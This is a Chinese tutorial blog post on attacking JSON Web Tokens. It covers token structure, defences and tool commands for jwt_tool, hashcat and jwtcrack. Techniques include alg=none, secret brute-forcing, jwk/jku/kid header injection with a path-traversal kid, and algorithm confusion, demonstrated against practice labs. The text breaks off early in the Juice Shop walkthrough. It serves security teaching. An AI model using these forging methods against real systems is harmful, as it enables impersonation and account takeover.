细说——JWT攻击

news2024/11/29 6:29:40

目录

  • 介绍
    • 什么是JWT
    • JWT有什么用
    • 为什么引入JWT
    • JWT的组成
    • JWT 特征识别
    • JWT、JWS与JWE
    • 生成JWT
    • 视频介绍
  • JWT攻击
    • 一些靶场
    • JWT 攻击的影响是什么?
    • JWT 攻击的漏洞是如何产生的?
    • 如何在 Burp Suite 中使用 JWT
    • 防御JWT攻击
  • 攻击工具
    • 爆破密钥工具:jwtcrack
    • 爆破密钥工具:hashcat
    • 综合利用工具:jwt_tool
      • 基本用法
      • 签名置为空【没啥用】
      • 破解密钥
      • 生成签名后的JWT【没啥用】
      • 破解密钥,并生成签名后的JWT
  • 攻击方式
    • 1. 敏感信息泄露
    • 2. 接受任意签名
    • 3. 接受未签名的令牌
    • 4. 暴力破解密钥
    • 5. JWT头部参数注入
      • 5.1 jwk参数注入
      • 5.2 jku参数注入
      • 5.3 kid参数注入
      • 5.4 其他有趣的 JWT 标头参数【忽略】
    • 6 JWT算法混淆攻击(又称:密钥混淆攻击)
      • 6.1 对称与非对称算法
      • 6.2 算法混淆漏洞是如何产生的?
      • 6.3 算法混淆攻击
      • 6.4 从现有令牌派生公钥
    • 7. 畸形的JWT攻击
  • 案例1:Owasp Juice Shop
    • 1. 发现JWT登录
    • 2. 发现网站邮箱格式
    • 3. 修改 JWT
    • 4. 验证是否存在漏洞
    • 5. 漏洞利用
  • 案例2:BurpSuite
  • 案例2.1:接受任意签名
    • 1. 登录靶场
    • 2. 查看JWT内容
    • 3. 篡改 JWT
  • 案例2.2:接受未签名的令牌
    • 1. 登录靶场
    • 2. 验证漏洞
    • 3. 漏洞利用
  • 案例2.3:暴力破解密钥
    • 1. 登录靶场
    • 2. 爆破密钥
      • 方式1:jwtcrack
      • 方式2:hashcat
      • 方式3:jwt_tool
    • 3. 重新签名
      • 方法1:使用BP插件JWT Editor
      • 方法2:使用BP插件JSON Web Tokens
      • 方法3:使用 jwt.io
      • 方法4:使用jwt_tool
    • 4. 漏洞利用
  • 案例2.4:jwk参数注入攻击
    • 1. 登录靶场
    • 2. 创建RSA密钥
    • 3. 签名篡改后的JWT
    • 4. 漏洞利用
  • 案例2.5:jku参数注入攻击
    • 1. 登录靶场
    • 2. 制作恶意jku
    • 3. 修改并签署 JWT
    • 4. 漏洞利用
  • 案例2.6:kid参数注入攻击
    • 1. 登录靶场
    • 2. 新建对称密钥
    • 3. 修改并签名 JWT
    • 4. 漏洞利用
  • 案例2.7:算法混淆攻击
    • 1. 打开靶场
    • 2. 生成恶意签名密钥
    • 3. 修改并签署令牌
    • 4. 漏洞利用
  • 案例2.8:从现有令牌派生公钥
    • 1. 获取服务器生成的两个 JWT
    • 2. 暴力破解服务器的公钥
    • 3. 生成恶意签名密钥
    • 4. 修改并签署令牌
    • 5. 漏洞利用
  • 参考

介绍

什么是JWT

JSON Web Token (JWT) 是一种标准化格式,用于在系统之间发送加密签名的 JSON 数据。它们理论上可以包含任何类型的数据,但最常用于发送有关用户信息的声明,作为身份验证、会话处理和访问控制机制的一部分。

与经典会话令牌不同,服务器需要的所有数据都存储在 JWT 本身的客户端中。这使得 JWT 成为高度分布式网站的热门选择,在这些网站中,用户需要与多个后端服务器无缝交互。
它一般会放置在**Authorization****Cookie**或者请求体里面。

JWT有什么用

JWT 最常见的场景就是授权认证,一旦用户登录,后续每个请求都将包含 JWT,系统在每次处理用户请求的之前,都要先进行 JWT 安全校验,通过之后再进行处理。主要用于验证用户身份信息及跨域的身份验证。

为什么引入JWT

弥补session认证。
在传统的web应用中,我们通常采用session认证:
session认证流程:

  1. 客户端将用户名/密码通过某种加密的方式发送给服务器
  2. 服务器接收到客户端请求之后进行验证,验证通过后使用Set-Cookie将用户的唯一sessionid放入到cookie当中,并将生成的sessionid和用户的关联信息存入到内存。
  3. 客户端第二次访问后服务器从当前cookie中取出sessionid并从内存中拿到相同的sessionid,如果不存在,或者没有携带sessionid则说明该用户登陆过期,或者未登陆。

session认证的一些缺点:

  1. 由于使用session进行认证的方式必须存储sessionid,当用户量过大时对服务器内存消耗影响巨大。如果你没有设置session的过期时间(关闭浏览器并不会导致cookie消失),那么对你的服务器来说消耗是致命的。
  2. 如果你没有将session存在一个所有服务器都可以获取得到的地方,如redis。那么意味着在本台服务器上面存储的sessionid其他服务器无法获取。用户进行请求时必须请求到这台服务器上面。可扩展性较差。
  3. 跨平台性较差,传统的session认证方式在移动端很难行得通。你必须开发二套不同的逻辑对web和移动端进行认证。

jwt认证流程:

  1. 客户端将用户名/密码通过某种加密的方式发送给服务器。
  2. 服务器接收到客户端请求后进行验证,验证通过服务器生成token返回给客户端。客户端将token存储在本地。
  3. 客户端每次请求将token携带在http header头中, 服务器端将token取出进行解密。

jwt认证的优点:

  1. 服务器端无需保存token,以加解密的方式代替存储,节省了内存空间。
  2. 无状态的token不依赖于服务器保存会话信息,更利于水平扩展。
  3. 相比于传统的session认证方式,jwt对移动端的支持更友好。

JWT的组成

JWT由三部分组成,用.拼接。举例如下:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

使用专业网站:https://jwt.io/ 或者 https://token.dev/(不常用)
JWT由三部分构成:
第一部分我们称它为头部(header),是一个 JSON 对象。

头部是用来声明此jwt的类型和加密算法,它们通常由algtyp这二个字段组成。

  1. alg字段通常用于表示加密采用的算法。如“HS256”、“RS256”等
  2. typ字段通常用于表示类型
  3. 还有一些其他可选参数,如“kid”、“jku”、“ x5u”等

第二部分我们称其为载荷(payload),是一个 JSON 对象。

主要承载了各种声明并传递明文数据,一般用于存储用户的信息,如 id、用户名、角色、令牌生成时间和其他自定义声明。

  1. iss:该字段表示jwt的签发者。可以用你的应用唯一标识或者高权限的userid填充此字段。
  2. sub:该jwt面向的用户。
  3. aud:jwt的接收方。
  4. exp:jwt的过期时间,通常来说是一个时间戳。
  5. iat:jwt的签发时间,常来说是一个时间戳。
  6. jti:此jwt的唯一标识。通常用于解决请求中的重放攻击。该字段在大多数地方没有被提及或使用。因为使用此字段就意味着必须要在服务器维护一张jti表, 当客户端携带jwt访问的时候需要在jti表中查找这个唯一标识是否被使用过。使用这种方式防止重放攻击似乎让jwt有点怪怪的感觉, 毕竟jwt所宣称的优点就是无状态访问

第三部分是签证(signature)

Signature 是对 Header 和 Payload 进行签名,具体是用什么加密方式写在 Header的alg 中。同时拥有该部分的JWT被称为JWS,也就是签了名的JWT。

在这里插入图片描述

阅读 JWT 的第三部分,可以得知 JWT 是怎么来了:
第一部分:对 JSON 的头部做 base64 编码处理得到
第二部分:对 JSON 类型的 payload 做 base64 编码处理得到
第三部分:

  1. 分别对头部和载荷做base64编码,并使用.拼接起来
  2. 使用头部声明的加密方式,对base64编码前两部分合并的结果加盐加密处理,作为 JWT 第三部分

在大多数情况下,任何有权访问令牌的人都可以轻松读取或修改此数据。因此,任何基于 JWT 的机制的安全性都严重依赖于加密签名。

更进一步的说明,参见BurpSuite网络安全学院:https://portswigger.net/web-security/jwt

JWT 特征识别

  1. 一般会放置在Authorization、Cookie或者请求体里面。
  2. eyJ开头,.分割成三部分。对应检测的正则如下:
(eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9._-]{10,}|eyJ[A-Za-z0-9_\/+-]{10,}\.[A-Za-z0-9._\/+-]{10,})

可以通过HaE插件很方便的识别
在这里插入图片描述

JWT、JWS与JWE

JWT规范的约束实际上是非常有限的。因为它只定义了将信息(“声明”)表示为可以在双方之间传输的JSON对象的格式。在实际使用中,JWT并没有真正作为一个独立的实体使用。JWT规范由JSON Web签名(JWS)和JSON Web加密(JWE)规范组成,共同定义了实际实现JWT的具体方法。
在这里插入图片描述

也就是说,JWT通常是指JWS或JWE令牌,JWE同理,只是令牌的实际内容是经过加密的。
简单来说就是:jws(JSON Web Signed)并没有对数据进行加密,如果我们想保证数据的安全就需要使用jwe(JSON Web Encryption)对jwt进行加密。
关于这一点,更进一步的解释参见:一文读懂JWT,JWS,JWE

生成JWT

Python生成Jwt Web Token:

import time
import jwt

# 头信息
head = {
    "alg": "HS256",
    "typ": "jwt"
}
# payload
payload = {
    "iat": time.time(),
    "name": "admin"
}
# 调用jwt库,生成json web token
#                                秘钥      加密算法
jwt_token = jwt.encode(payload, "1121", algorithm="HS256", headers=head)
# 输出
print(jwt_token)

运算结果:
eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2Njg2NTI3NjguMzE2MjY5MiwibmFtZSI6ImFkbWluIn0.CfR27zXtS7CUf99AkEG4LroIT19dKdgPmqcrTC7sD3o

在这里插入图片描述

视频介绍

上面是文字介绍,下面是视频介绍:
通俗易懂:https://www.bilibili.com/video/BV1KY4y1q7PU
稍微复杂一点:https://www.bilibili.com/video/BV1cK4y197EM

JWT攻击

JWT 攻击涉及用户将修改后的 JWT 发送到服务器以实现恶意目标。通常,此目标是通过模拟另一个已经过身份验证的用户来绕过身份验证和访问控制。
在这里插入图片描述

关于jwt的使用安全性,其实国外已经有很详细的研究文章进行介绍了,具体参考地址:
https://research.securitum.com/jwt-json-web-token-security/
freebuf翻译版本地址:
https://www.freebuf.com/vuls/219056.html
漏洞讲解视频:

  1. 源视频地址:https://www.youtube.com/watch?v=RFKbHrqMiv8
  2. 国内搬运视频(带中文翻译):https://www.iculture.cc/knowledge/pig=25362

一些靶场

在线靶场:

  1. BurpSuite:https://portswigger.net/web-security/all-labs#jwt【案例2.x中会介绍】
  2. https://jwt-lab.herokuapp.com/challenges
  3. Juice Shop:https://juice-shop.herokuapp.com/
  4. attackdefense:https://attackdefense.com/search?search=jwt
  5. https://authlab.digi.ninja/JWT_Cracking(用来练习破解密钥的靶场)

本地靶场:

  1. Juice Shop:参见案例1
  2. WebGoat

JWT 攻击的影响是什么?

JWT 攻击的影响通常很严重。如果攻击者能够使用任意值来创建自己的有效令牌,他们可能会提升自己的权限或冒充其他用户,从而完全控制他们的帐户。

JWT 攻击的漏洞是如何产生的?

JWT 漏洞通常是由于应用程序本身的 JWT 处理有缺陷而引起的。与 JWT 相关的各种规范在设计上相对灵活,允许网站开发人员自行决定许多实现细节。这可能会导致他们意外地引入一些存在漏洞的库文件。
这些缺陷通常意味着 JWT 的签名未正确验证。这使攻击者能够篡改通过令牌的有效负载传递给应用程序的值。即使签名得到了可靠的验证,它是否真正可信在很大程度上取决于服务器的密钥是否保密。如果密钥以某种方式泄露,或者可以被猜测或暴力破解,则攻击者可以为任意令牌生成有效签名,从而破坏整个机制。

如何在 Burp Suite 中使用 JWT

参见:Working with JWTs in Burp Suite

安装BurpSuite官方推荐的插件:JWT Editor,从搜索结果中看到一个名为“JSON Web Tokens”的插件,这两者都差不多,插件的使用在下文“案例2.3:暴力破解密钥 → 重新签名”中都会介绍。由于bp官方介绍的是“JWT Editor”,因此以后也主要使用“JWT Editor”。两款工具都是很好用的。
在这里插入图片描述

另外,根据BurpSuite官方这篇文档的描述:https://portswigger.net/web-security/jwt
Burp Suite Professional 2022.5.1开始,Burp Scanner可以自动检测 JWT 机制中的许多漏洞。有关详细信息,请参阅Target > Issued definitions选项卡上的相关问题定义。具体真的是否好用,拭目以待。

防御JWT攻击

来自BurpSuite的建议:

  1. 使用最新的库来处理JWT,并确保开发人员对相关安全问题足够了解。现代代码库的使用降低了在代码实现中引入安全漏洞的可能性,但由于相关规范固有的灵活性,也并非万无一失。
  2. 确保对收到的任何JWT进行严格的签名验证,并考虑边缘情况,如使用非预期的算法签名的JWT。
  3. 为jku头部提供允许主机白名单,并严格执行。
  4. 确保不会受到kid头部参数路径穿越或SQL注入的影响。
  5. 为发行的任何令牌设置到期日期
  6. 尽可能避免在 URL 参数中发送令牌
  7. 使发行服务器能够撤销令牌(例如,在注销时)

来自 安恒信息安全服务 的建议:
避免在令牌中直接传输用户的敏感数据以及系统内部的关键参数
● 若使用对称加密算法,应使用强密钥提高秘钥破解的难度。
● 若使用非对称加密算法,应在服务端增加已授权算法的白名单,限制签名算法类型,防止密钥混淆攻击。
严格验证并过滤从用户端接收的数据,例如kid、jku等关键参数,防止因没有对参数进行正确校验而产生的安全风险。
在Payload字段中增加一些业务上的字段,用于校验当前JWT是否被滥用,例如增加设备号、权限的信息等,可以与上下文的信息进行对照。

攻击工具

爆破密钥工具:jwtcrack

使用C语言编写的爆破工具,基于计算机的算力爆破的,并非基于密码本爆破。
项目地址:https://github.com/brendan-rius/c-jwt-cracker
安装:

apt-get install libssl-dev
git clone https://github.com/brendan-rius/c-jwt-cracker.git
cd c-jwt-cracker
make

在这里插入图片描述

爆破密钥工具:hashcat

你需要提供一个来自目标服务器的有效的、签名的 JWT,和一个字典(在BuepSuite上,它会推荐一个爆破字典)。然后就可以运行以下命令,将 JWT 和字典作为参数传递。如果多次运行该命令,则需要包含--show标志来显示输出结果。

hashcat -a 0 -m 16500 <jwt> <wordlist>

如果你是使用虚拟机里面的hashcat,大概率会因为内存不足而破解失败。我这里使用的是kali官方打包好的VMware版本虚拟机,结果提示我内存不足
在这里插入图片描述

解决办法是下载windows版本的hashcat:https://github.com/hashcat/hashcat/releases
在这里插入图片描述

综合利用工具:jwt_tool

jwt_tool是一款用于验证、伪造、扫描和篡改 JWT的综合性工具
项目地址:https://github.com/ticarpi/jwt_tool
它的功能包括:

  • 检查令牌的有效性
  • 测试已知漏洞:
    • (CVE-2015-2951) _alg=none_签名绕过漏洞
    • (CVE-2016-10555) _RS/HS256_公钥不匹配漏洞
    • (CVE-2018-0114)_密钥注入_漏洞
    • (CVE-2019-20933/CVE-2020-28637)_空白密码_漏洞
    • (CVE-2020-28042)_空签名_漏洞
  • 扫描错误配置或已知弱点
  • 模糊声明值以引发意外行为
  • 测试秘密/密钥文件/公钥/JWKS 密钥的有效性
  • 通过字典爆破密钥
  • 伪造新的令牌标头和有效负载内容并使用密钥或通过其他攻击方法创建新签名
  • 时间戳篡改
  • RSA 和 ECDSA 密钥生成和重建(来自 JWKS 文件)
  • …还有更多!

关于上述功能,以及工具的使用细节,参考这里:https://github.com/ticarpi/jwt_tool/wiki
安装:

pip install termcolor cprint pycryptodomex requests
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool

第一次运行此工具的时候,它会创建一个配置文件
在这里插入图片描述

基本用法

在这里插入图片描述

签名置为空【没啥用】

这里以在线靶场https://jwt-lab.herokuapp.com/为例第一关为例。
打开靶场,来到“/users”,随便选中一个账号,点击最右侧的“Destroy”即可设置该账户的密码。于是,就有了一组账号密码,然后登录靶场
在这里插入图片描述

打开第一关,这一关是“接受任意签名”的靶场环境,如图所示,当前身份是users
在这里插入图片描述

篡改签名为none,篡改身份为admin。
在这里插入图片描述

签名依然存在,但是身份变成了admin
在这里插入图片描述

下面使用工具进行演示:

python ./jwt_tool.py eyJhbGciOiJSUzI1NiJ9.eyJuYW1lIjoidXNlcnMifQ.PcT7hCKp4B275nb8uy3tTNr_lYSws0VZldtIRQy43fcNe3B2F5Fv3pzqHr6vA50eBeMFbUfwJoCUoqPtOHXNp-_uH63ZfHZMZmreNngIHQ8D2Uo6Tg2NMR-YOYOX3Mz9UOeQsbk48X9U0t8L-pi2qDQUTEloaBaWLSCVQIfhyDablIOtzAc45FWwfuR5PgydWmc1COunDSEs9QNl_klbtjK6VSv46VY35P2ljyW2sLPasa1iZG68QVYmzWpq629T8_tbGcGngCDfTMK4jD4hWarhvBeEkpACAGvxlyoFclYlwcDLMSmPt8FwvDy2iQLL6dvN1NuCP629Zt-U7p7hWA -X a

查看帮助手册得知:-X a的作用是设置algnone,即:设置签名为空。
可以看到工具生成了四种不同 none 值对应的 payload ,实际测试中可以逐一替换进行测试,同时也可尝试将“alg”字段直接置空(使用-X n)。
在这里插入图片描述

base64解码得知,用户名没变,所以还需要把拿到的结果,手工修改才行。
在这里插入图片描述

经过上面的演示,个人感觉这个功能没啥用。

破解密钥

以此靶场演示:https://authlab.digi.ninja/JWT_Cracking

# 使用字典破解
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt

# 指定密码
python3 jwt_tool.py JWT_HERE -C -p password_here

在这里插入图片描述

生成签名后的JWT【没啥用】

以此靶场演示:https://authlab.digi.ninja/JWT_Cracking
首先是得破解出密钥,然后来到https://jwt.io/篡改payload(但是在这个网站上填写密钥就可以生成签名了,没必要再去工具中让他生成了,所以个人感觉这个功能没啥实际用处)

  1. 破解出密钥

在这里插入图片描述

  1. 篡改payload,复制结果

在这里插入图片描述

  1. 重新生成JWT
python ./jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2Njg3NTIxODcsImxldmVsIjoiYWRtaW4iLCJ1c2VyIjoiamFzcGVyIn0. -S hs256 -p "hello"

在这里插入图片描述

  1. 登录成功

在这里插入图片描述

破解密钥,并生成签名后的JWT

参见下文:
“案例2.3:暴力破解密钥” → “3. 重新签名” → “方法4:使用jwt_tool”

攻击方式

常规利用方式一般为针对 头部(Header)中的参数进行篡改,进而操控密钥完成服务端对 签证(Signature) 部分校验步骤,实现签名校验步骤绕过,然后可以通过修改 载荷(Payload) 中 id 、用户名等参数,实现伪造任意用户 token 的目的。

1. 敏感信息泄露

由于 Header 和 Payload 两部分是使用 Base64URL 方法编码的,所以这两个部分的内容是任何人都可以查看的

2. 接受任意签名

JWT库通常会提供一个验证令牌的方法,同时提供对其解码的方法。例如,对于Node.js库jsonwebtoken来说,这两个方法分别是verify()和decode()。
但有时开发人员会混淆这两个方法,只把传入的令牌传给decode()方法。这实际上意味着应用程序根本就没有对签名进行验证。
总结:格式为{Header.Payload.signature},由于不验证signature,导致可以随意篡改Payload。
有时候需要篡改Header,如“攻击工具 → 综合利用工具:jwt_tool →签名置为空【没啥用】”中的演示;
有时候不需要篡改Header,如下面的案例2.1

3. 接受未签名的令牌

JWT头部还包含一个alg参数。该参数的作用就是告诉服务器对令牌进行签名时使用的是哪种算法,换句话说就是在验证签名时需要使用哪种算法。

{
  "alg": "HS256",
  "typ": "JWT"
}

但本质上这种方法存在安全隐患,因为服务器只能隐式地信任提供令牌的用户的输入(注意,这些输入受控于该用户),而该令牌根本没有被验证过。换句话说攻击者可以直接影响服务器检查令牌是否值得信任的方式。

JWT既可以使用一系列不同的算法进行签名,也可以不签名。在这种情况下,alg参数被设置为None,表示所谓的 “不安全的JWT”。由于这种情况明显存在安全问题,因此服务器通常会拒绝没有签名的令牌。但由于这种过滤依赖于字符串解析,所以攻击者可以使用混淆技术绕过这些过滤器,如混合大写和非预期的编码等。(需要注意的是,即使令牌是未签名的,载荷部分也必须以点号结尾。)
这种配置一般是用于开发环境中测试使用,但是生产环境中也有可能因为开发人员误操作而导致此类问题的发生。
总结:格式为{Header.Payload.},将Header中的算法改为None由于不验证signature,导致可以随意篡改Header、Payload【下面的案例1,案例2.2 介绍了这种攻击方式】

4. 暴力破解密钥

某些签名算法,例如HS256(HMAC + SHA-256),会像密码一样使用一个任意的、独立的字符串作为秘密密钥。需要保证这个秘钥不被轻易猜到或暴力破解,否则攻击者能以任意的头部和载荷值来创建JWT,然后用密钥重新给令牌签名。

在实现JWT应用时,开发人员有时会忘记改变默认或占位的密码,甚至可能复制和粘贴在网上找到的代码片段,然后忘记改变作为示例提供的硬编码的密码。在这种情况下,攻击者使用流行的密码本,可以轻松对服务器的登陆凭据进行暴力破解。
总结:如果能爆破出密钥,就自己生成一个新的签名【下面的案例2.3 介绍了这种攻击方式】
这里会介绍3中爆破工具:jwtcrack、jwt_tool、hashcat
这里提供一个专门的练习靶场:https://authlab.digi.ninja/JWT_Cracking
在这里插入图片描述

使用jwtcrack打通靶机
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

使用hashcat打通靶机
在这里插入图片描述

使用jwt_tool打通靶机
由于密钥不在这个字典里面,需要手动添加一下来演示效果:

echo "hello" >> ./jwt.secrets.list
python ./jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2Njg2NzY2MTgsImxldmVsIjoidXNlciIsInVzZXIiOiJqYXNwZXIifQ.Rihen5aDv5Tkt6OLaR1Yi-WdvBWsI7hXt9i1JxjWe1I -C -d ./jwt.secrets.list

在这里插入图片描述

5. JWT头部参数注入

根据JWS规范,只有头部参数alg是必需的。然而实际中,JWT头部(也称为JOSE头部)通常包含其他几个参数。以下是攻击者特别感兴趣的参数:

  • jwk(JSON Web Key):提供一个表示密钥的嵌入式JSON对象。
  • jku(JSON Web Key Set URL):提供一个URL,服务器可以从中获取一组包含正确密钥的密钥。
  • kid(Key ID):提供一个ID,在有多个密钥可供选择的情况下,服务器可以使用该ID来识别正确的密钥。根据密钥的格式可能还有一个匹配的kid参数。

如上,这些用户可控制的参数用于告诉接收方服务器在验证签名时使用哪些密钥。

5.1 jwk参数注入

JWS(签名后的JWT)规范描述了一个可选的 jwk 头部参数,服务器可以用它将其公钥直接嵌入JWK格式的令牌本身。

JWK(JSON Web密钥)是一种标准化的格式,用于将密钥表示为JSON对象。

公钥和私钥:
如果你不熟悉术语“公钥”和“私钥”,BurpSuite提供了详细的资料,请参阅 对称算法与非对称算法

JWT头部示例如下:

{
    "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
    "typ": "JWT",
    "alg": "RS256",
    "jwk": {
        "kty": "RSA",
        "e": "AQAB",
        "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
        "n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
    }
}

理想情况下,服务器应该只使用有限的公钥白名单来验证 JWT 签名。但是,配置错误的服务器有时会使用嵌入在jwk参数中的任何密钥。因此攻击者可以用自己的RSA私钥对修改过的JWT进行签名,然后在jwk头部中嵌入对应的公钥。
可以使用bp插件“JWT Editor”很方便的完成这种攻击。(你也可以通过jwk自己添加标头来手动执行此攻击。但是,你可能还需要更新 JWT 的kid标头参数以匹配kid嵌入密钥的参数。该扩展的内置攻击会为您处理此步骤)

  1. 在加载该扩展后,在Burp的主选项卡栏中,转到JWT Editor Keys选项卡。
  2. 创建一个新的RSA密钥。
  3. Burp Repeater发送一个包含JWT的请求。
  4. 在消息编辑器中,切换到扩展生成的JSON Web Token选项卡,并以你喜欢的方式修改令牌的载荷。
  5. 点击Attack按钮,然后选择Embedded JWK。当收到提示时,选择新生成的RSA密钥。
  6. 发送请求,测试服务器的响应情况。

【下面的案例2.4 介绍了这种攻击方式】

5.2 jku参数注入

有些服务器并不会直接使用jwk头部参数来嵌入公钥,而是使用jku(JWK Set URL)。jku表示把公钥信息放到指定的 URL 中,服务端通过访问URL来获取相应密钥进行校验,这样可以更灵活地切换密钥。
实际上所谓JWK Set就是一个JSON对象,其中包含一组表示密钥的JWK,例如:

{
    "keys": [
        {
            "kty": "RSA",
            "e": "AQAB",
            "kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab",
            "n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ"
        },
        {
            "kty": "RSA",
            "e": "AQAB",
            "kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA",
            "n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw"
        }
    ]
}

像这样的JWK集有时会通过一个标准的端点对外公开,如/.known/jwks.json,攻击者有时可以利用URL解析的差异来绕过这种过滤机制。
【下面的案例2.5 介绍了这种攻击方式】

5.3 kid参数注入

服务器可能会使用多个加密密钥来为不同类型的数据进行签名。出于这个原因,JWT的头部可能包含一个kid(密钥ID)参数,用来帮助服务器识别在验证签名时要使用的密钥。
验证密钥通常被存储为JWK Set。在这种情况下,服务器可以直接寻找与令牌具有相同kid参数的JWK。然而JWS规范并没有为这个ID定义具体的结构,它只是开发人员任意选择的一个字符串。例如可以使用kid参数来指向数据库中的一个特定条目,甚至文件名称。
如果该参数受到目录遍历的影响,攻击者就有可能迫使服务器使用其文件系统中的任意文件作为验证密钥。

{
    "kid": "../../path/to/file",
    "typ": "JWT",
    "alg": "HS256",
    "k": "asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc"
}

如果服务器还支持使用对称算法签名的 JWT,这尤其危险。在这种情况下,攻击者可能会将kid参数指向一个可预测的静态文件,然后使用与该文件内容匹配的秘密对 JWT 进行签名。
理论上您可以对任何文件执行此操作,但最简单的方法之一是使用/dev/null,它存在于大多数 Linux 系统上。由于这是一个空文件,因此获取它会返回null,可以用一个Base64编码的null字节来给令牌签名将得到一个有效的签名。如果服务器将其验证密钥存储在数据库中,kid头部参数也是一个潜在的SQL注入攻击的载体。
【下面的案例2.6 介绍了这种攻击方式】

5.4 其他有趣的 JWT 标头参数【忽略】

暂无相关靶场,无法演示

攻击者也可能对以下标头参数感兴趣:
**cty(内容类型):**用来声明JWT载荷中内容的媒体类型。通常情况下会省略该参数,但底层解析库可能还是支持它。如果攻击者已经找到了绕过签名验证的方法,可能会尝试注入cty参数,将内容类型改为text/xmlapplication/x-java-serialized-object,这有可能为XXE和反序列化攻击提供方向。
**x5c(X.509证书链):**用于传递用于对JWT进行数字签名的X.509公钥证书或证书链。这个头部参数可用于注入自签证书,类似于上面讨论的jwk头部注入攻击。由于X.509格式及其扩展的复杂性,解析这些证书也很可能会引入漏洞。
有关更多详细信息,请查看CVE-2017-2800和CVE-2018-2633)

6 JWT算法混淆攻击(又称:密钥混淆攻击)

即使服务器使用了您无法暴力破解的可靠机密,您仍然可以通过使用开发人员未预料到的算法对令牌进行签名来伪造有效的 JWT。这被称为算法混淆攻击。
当攻击者能够强制服务器使用与网站开发人员预期不同的算法来验证 JSON Web Token ( JWT ) 的签名时,就会发生算法混淆攻击(也称为密钥混淆攻击) 。如果这种情况处理不当,攻击者可能会伪造包含任意值的有效 JWT,而无需知道服务器的秘密签名密钥。

6.1 对称与非对称算法

可以使用一系列不同的算法对 JWT 进行签名。其中一些,例如 HS256 (HMAC + SHA-256) 使用“对称”密钥。这意味着服务器使用单个密钥来签署和验证令牌。显然,这需要保密,就像密码一样。
在这里插入图片描述

其他算法,例如 RS256 (RSA + SHA-256) 使用“非对称”密钥对。这包括服务器用来签署令牌的私钥和可用于验证签名的数学相关公钥。
在这里插入图片描述

顾名思义,私钥必须保密,但公钥通常是共享的,这样任何人都可以验证服务器发布的令牌的签名。

6.2 算法混淆漏洞是如何产生的?

算法混淆漏洞通常是由于 JWT 库的实施有缺陷而引起的。尽管实际验证过程因所使用的算法而异,但许多库都提供了一种与算法无关的单一方法来验证签名。这些方法依赖alg令牌标头中的参数来确定它们应执行的验证类型
以下伪代码显示了此泛型verify()方法的声明在 JWT 库中的样子的简化示例:

function verify(token, secretOrPublicKey){
    algorithm = token.getAlgHeader();
    if(algorithm == "RS256"){
        // Use the provided key as an RSA public key
    } else if (algorithm == "HS256"){
        // Use the provided key as an HMAC secret key
    }
}

当随后使用此方法的网站开发人员假设它将专门处理使用 RS256 等非对称算法签名的 JWT 时,就会出现问题。由于这个有缺陷的假设,他们可能总是将固定的公钥传递给方法,如下所示:

publicKey = <public-key-of-server>;
token = request.getCookie("session");
verify(token, publicKey);

在这种情况下,如果服务器接收到使用 HS256 等对称算法签名的令牌,库的通用verify()方法会将公钥视为 HMAC secret。这意味着攻击者可以使用 HS256 和公钥对令牌进行签名,服务器将使用相同的公钥来验证签名

您用于签名令牌的公钥必须与存储在服务器上的公钥完全相同。这包括使用相同的格式(例如 X.509 PEM)并保留任何非打印字符,例如换行符。在实践中,您可能需要尝试不同的格式才能使这种攻击起作用。

6.3 算法混淆攻击

假设我们能够将签名算法从 RS256 更改为 HS256,我们就可以强制应用程序仅使用一个密钥来完成加密和解密这两项任务,此时服务端代码将使用公钥作为密钥,然后使用HS256算法验证签名。
此类攻击方式需要攻击者能够在程序中获取到泄露的公钥。

算法混淆攻击通常涉及以下步骤:

  1. 获取服务器的公钥
  2. 将公钥转换为合适的格式
  3. 创建一个恶意 JWT,其中修改了有效负载并将alg标头设置为HS256.
  4. 使用公钥作为secret,使用 HS256 对令牌进行签名。

【下面的案例2.7 介绍了这种攻击方式】

6.4 从现有令牌派生公钥

在公钥不容易获得的情况下,你仍然可以通过从一对现有的 JWT 派生密钥来测试算法是否混淆。譬如工具:rsa_sign2n,BurpSuite创建了此工具的简化版本,我们可以将其作为单个命令运行:

docker run --rm -it portswigger/sig2n <token1> <token2>	

【下面的案例2.8 介绍了这种攻击方式】

7. 畸形的JWT攻击

案例1:JWT签名无效 https://www.yuque.com/u1881995/xwfvho/cvn0k8#oG4Pe

案例1:Owasp Juice Shop

通过此案例,了解最基本的利用方式,以及一些注意事项!
你可以使用在线靶场:https://juice-shop.herokuapp.com/
或者本地docker搭建:

docker pull bkimminich/juice-shop
docker run -d -p 80:3000 bkimminich/juice-shop

如何攻击?思路是,尝试设置 JWT 的加密方式为空,这样我可以自行设计出 JWT 的前两部分,第三部分置为空。然后通过修改账号密码的方式来重置管理员的密码。开始演示。

1. 发现JWT登录

注册账户:123@qq.com,123456登录系统,发现存在 JWT。并且注意到AuthorizationCookietoken的值是一致的。
在这里插入图片描述

对应的完整请求包内容如下:

GET /rest/user/whoami HTTP/1.1
Host: 192.168.111.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
